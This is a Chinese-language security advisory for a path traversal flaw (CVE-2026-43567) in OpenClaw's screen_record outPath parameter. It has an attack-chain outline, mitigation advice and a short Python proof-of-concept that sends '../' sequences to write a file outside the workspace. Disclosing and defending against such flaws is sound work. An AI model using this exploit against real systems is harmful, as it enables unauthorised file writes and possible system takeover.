CVE-2026-43567 CVSS 6.5 中危

CVE-2026-43567 OpenClaw路径遍历漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43567

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.4.10之前的版本中存在一个路径遍历漏洞。该漏洞出现在screen_record工具的outPath参数中，允许攻击者绕过仅限工作区的文件系统保护机制。由于缺乏有效的路径验证，攻击者可以通过构造特殊的路径参数，将文件写入到预期工作区之外的任意位置。这可能导致系统完整性受损，攻击者可能利用此漏洞覆盖关键系统文件或植入恶意脚本。

技术细节

该漏洞的根本原因是OpenClaw在处理screen_record工具的outPath参数时，未能正确过滤路径遍历字符，导致旨在限制文件操作在工作区内的安全机制被绕过。攻击者利用低权限账户即可发起攻击，无需用户交互。通过在outPath参数中注入“../”序列或使用绝对路径，攻击者可以突破工作区边界。根据CVSS向量分析，该漏洞主要影响完整性（I:H），允许攻击者在系统任意位置写入数据，虽然不直接影响机密性和可用性，但结合其他攻击手段，可能导致远程代码执行或权限提升。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行的是OpenClaw，且版本低于2026.4.10。

STEP 2

2. 漏洞利用

攻击者向screen_record工具发送请求，在outPath参数中注入包含'../'的路径，试图绕过工作区限制。

STEP 3

3. 文件写入

由于校验缺失，系统将文件写入到攻击者指定的非工作区路径（如系统目录）。

STEP 4

4. 影响达成

攻击者成功修改系统文件完整性，可能进一步植入Webshell或覆盖配置文件以获取更高权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-43567: Path Traversal in OpenClaw screen_record
# This script demonstrates writing a file outside the designated workspace.

import requests

def exploit(target_ip, file_content):
    url = f"http://{target_ip}/api/screen_record"
    
    # The payload uses '../' to traverse up the directory tree
    # bypassing the workspace restriction.
    malicious_path = "../../tmp/poc_file.txt"
    
    data = {
        "outPath": malicious_path,
        "data": file_content
    }
    
    try:
        response = requests.post(url, data=data)
        if response.status_code == 200:
            return f"[+] Success: File potentially written to {malicious_path}"
        else:
            return f"[-] Failed: Server returned {response.status_code}"
    except Exception as e:
        return f"[-] Error: {str(e)}"

if __name__ == "__main__":
    print(exploit("192.168.1.100", "CVE-2026-43567 Proof of Concept"))

影响范围

OpenClaw < 2026.4.10

防御指南

临时缓解措施

建议立即检查OpenClaw组件版本，若存在漏洞应尽快应用官方补丁。在无法立即升级的情况下，建议通过网络ACL限制对screen_record接口的访问，或在WAF层配置规则拦截包含路径遍历字符（如“../”）的请求，并最小化服务运行权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表